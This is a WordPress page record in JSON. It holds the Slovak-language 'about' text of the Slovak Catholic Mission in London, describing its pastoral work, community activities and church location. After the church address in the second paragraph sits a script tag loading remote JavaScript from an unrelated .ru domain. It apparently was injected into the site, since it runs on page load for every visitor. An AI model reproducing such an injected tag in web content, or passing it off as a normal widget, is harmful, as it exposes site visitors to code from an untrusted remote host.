{"id":9758,"date":"2010-10-26T21:56:36","date_gmt":"2010-10-26T20:56:36","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=9758"},"modified":"2014-06-28T11:21:31","modified_gmt":"2014-06-28T10:21:31","slug":"cinnost-misie","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=9758","title":{"rendered":"\u010cINNOS\u0164 MISIE"},"content":{"rendered":"<p style=\"text-align: justify;\">SLOVENSK\u00c1 KATOL\u00cdCKA MISIA V LOND\u00ddNE (SCM) je miestom sl\u00e1venia a pre\u017e\u00edvania viery Katol\u00edckej Cirkvi pri bohoslu\u017eb\u00e1ch a in\u00fdch liturgick\u00fdch sl\u00e1veniach, duchovnej podpory veriacich (hlavn\u00fd zmysel poslania misie), ale aj stretnut\u00ed slovensk\u00fdch krajanov, tr\u00e1venia spolo\u010dn\u00e9ho vo\u013en\u00e9ho \u010dasu, aktiv\u00edt kult\u00farnych, spolo\u010densk\u00fdch i \u0161portov\u00fdch, zdie\u013eania osudu migrantov, kontaktov a inform\u00e1cii pre \u013eud\u00ed \u017eij\u00facich vo Ve\u013ekej Brit\u00e1nii, najm\u00e4 v Lond\u00fdne. SCM chce nadviaza\u0165 na dlhoro\u010dn\u00fa trad\u00edciu katol\u00edckych misi\u00ed v in\u00fdch krajin\u00e1ch Eur\u00f3py, ktor\u00e9 sa v duchu kres\u0165anskej viery a potrieb Slov\u00e1kov \u017eij\u00facich v zahrani\u010d\u00ed st\u00e1li ich druh\u00fdm domovom alebo i \u00fato\u010diskom v r\u00f4znych \u017eivotn\u00fdch situ\u00e1ci\u00e1ch a potreb\u00e1ch.<\/p>\n<p style=\"text-align: justify;\">Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne patr\u00ed pod diec\u00e9zu Westminster. Je s\u00fa\u010das\u0165ou jednej z anglick\u00fdch farnost\u00ed, nako\u013eko doposia\u013e nem\u00e1 svoje vlastn\u00e9 priestory. Pastora\u010dn\u00e1 starostlivos\u0165 zahr\u0148uje veriacich na \u00fazem\u00ed Ve\u013ekej Brit\u00e1nie a Severn\u00e9ho \u00cdrska. S\u00fa\u010dasn\u00fdm s\u00eddlom SCM je kostol Our Lady of La Salette and St. Joseph na 14 Melior Street v Lond\u00fdne.<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n<p style=\"text-align: justify;\">Spolo\u010densk\u00e9 a politick\u00e9 dianie vo svete vy\u017eaduje od \u010dloveka, aby mal pevn\u00e9ho ducha, jasn\u00e9 ciele a priority, aby ne\u0161lo iba o rozvoj \u010disto \u013eudsk\u00fdm poznan\u00edm a \u00fasil\u00edm, ale malo aj svoj kontext v dedi\u010dstve na\u0161ich otcov &#8211; vo viere, ktor\u00fa sme prijali.<\/p>\n<p style=\"text-align: justify;\">V prostred\u00ed kozmopolitn\u00e9ho mesta, ak\u00fdm Lond\u00fdn ur\u010dite je, kde sa mie\u0161aj\u00fa mnoh\u00e9 n\u00e1rody, kult\u00fary a n\u00e1bo\u017eenstv\u00e1, je potreba upev\u0148ovania n\u00e1bo\u017eenskej i n\u00e1rodnej identity neust\u00e1le na nej pracova\u0165 a formova\u0165 ju, aby sa nestratil kontakt a v\u00e4zba k viere, jazyku, kult\u00fare a n\u00e1rodu, z ktor\u00fdch sme vzi\u0161li a vyrastali v nich.<\/p>\n<p style=\"text-align: justify;\">Komunita SCM v s\u00fa\u010dasnosti zdru\u017euje veriacich a buduje tak n\u00e1bo\u017eensk\u00e9 presved\u010denie. \u017dije nielen bohoslu\u017ebami a n\u00e1bo\u017eensk\u00fdmi podujatiami, ale tie\u017e starostlivo upev\u0148uje a rozv\u00edja vo v\u0161etk\u00fdch mysliach a srdciach krajanov n\u00e1rodn\u00e9 povedomie a n\u00e1rodn\u00fa hrdos\u0165, ako aj kult\u00farne, spolo\u010densk\u00e9, soci\u00e1lne, vzdel\u00e1vacie, \u0161portov\u00e9 a rodinn\u00e9 prostredie pre krajanov vo Ve\u013ekej Brit\u00e1nii, najm\u00e4 v Lond\u00fdne.<\/p>\n<p style=\"text-align: justify;\">Je centrom pre Slov\u00e1kov \u017eij\u00facich na \u00fazem\u00ed Ve\u013ekej Brit\u00e1nie. V s\u00fa\u010dasnosti s\u00fa u\u017e sformovan\u00e9 \u010fal\u0161ie centr\u00e1 &#8211; v Peterborough a v meste Manchester.<\/p>\n<p>Je otvorenou komunitou pre v\u0161etk\u00fdch \u013eud\u00ed dobrej v\u00f4le.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SLOVENSK\u00c1 KATOL\u00cdCKA MISIA V LOND\u00ddNE (SCM) je miestom sl\u00e1venia a pre\u017e\u00edvania viery Katol\u00edckej Cirkvi pri bohoslu\u017eb\u00e1ch a in\u00fdch liturgick\u00fdch sl\u00e1veniach, duchovnej podpory veriacich (hlavn\u00fd zmysel poslania misie), ale aj stretnut\u00ed&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=9758\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"parent":15711,"menu_order":1,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9758","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9758","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9758"}],"version-history":[{"count":10,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9758\/revisions"}],"predecessor-version":[{"id":16624,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9758\/revisions\/16624"}],"up":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15711"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9758"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}